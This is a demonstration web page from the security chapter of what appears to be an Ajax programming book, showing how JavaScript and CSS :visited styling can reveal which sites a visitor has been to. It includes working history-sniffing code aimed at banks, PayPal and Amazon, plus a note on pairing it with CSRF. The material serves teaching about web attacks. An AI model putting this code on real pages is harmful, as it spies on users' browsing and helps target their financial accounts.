<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Chapter 7 : Security - History</title>
<link rel="stylesheet" href="http://ajaxref.com/ch7/global.css" type="text/css" media="screen" />
a.stealhistory:link{color:#FF0000}
a.stealhistory:visited{color:#00FF00}<script src="http://ajaxref.com/ch7/utilities.js" type="text/javascript">
<script type="text/javascript">
function getHistoryLength()
{
var responseOutput = document.getElementById("responseOutput");
responseOutput.innerHTML = "<strong>Length of History through Javascript: </strong>" + window.history.length;
}
function getHistory(stealhistorysites)
{
var responseOutput = document.getElementById("responseOutput");
responseOutput.innerHTML = "<strong>Checking History through Javascript/CSS. </strong><br />";
responseOutput.innerHTML += "<br /><strong>You have been to: </strong><br />";
for (var i=0;i<stealhistorysites.length;i++)
{
if (checkHistory(stealhistorysites[i]))
responseOutput.innerHTML += stealhistorysites[i] + "<br />";
}
}
function checkHistory(url)
{
var found = false;
var link = document.createElement("a");
link.className = "stealhistory";
link.href = url;
link.appendChild(document.createTextNode("stealhistory"));
link.style.visibility = "hidden";
document.body.appendChild(link);
var color = getStyle(link,"color").toLowerCase();
document.body.removeChild(link);
if(color == "rgb(0, 255, 0)" || color == "#00ff00")
found = true;
return found;
}
window.onload = function()
{
var stealhistorysites = new Array("http://www.google.com/", "http://ajaxref.com/ch7/history.html", "https://www.wellsfargo.com/", "http://www.bankofamerica.com/", "http://www.washingtonmutual.com/", "http://www.amazon.com/", "https://home.americanexpress.com/", "https://www.paypal.com/");
document.requestForm.checkHistoryLength.onclick=function(){getHistoryLength();};
document.requestForm.checkVisited.onclick=function(){getHistory(stealhistorysites);};
var websites = document.getElementById("websites");
websites.innerHTML = "<strong>We will check for history of the following sites:</strong><ul>";
for (var i=0;i<stealhistorysites.length;i++)
websites.innerHTML += "<li>" + stealhistorysites[i] + "</li>";
websites.innerHTML += "</ul><br />";
}
</head>
<body>
<div class="content">
<h1>Stealing History with JavaScript and CSS</h1><br />
<form action="#" name="requestForm">
<input type="button" value="Check History Length" name="checkHistoryLength" />
<input type="button" value="Check for Visited URLs" name="checkVisited" />
</form>
</div>
<br />
<div id="websites" class="response"></div>
<br /><br />
<div id="responseOutput" class="response"></div>
<br /><br />
<div id="scenarios">
<h3>Scenarios</h3>
<p>An evil site or an XSS compromised site may contain this history checking script to see if you have been to sites that interest them. They will then use a CSRF to attempt to perform some action at that site as you if you are still authenticated via a cookie.</p>
<p><em>Note:</em> The example only checks for a few sites but it could check quite a number in a very short time or use a communications request to fetch the list of sites or URLs it is interested in checking for.</p>
</div>
</body>
</html>
Report a bug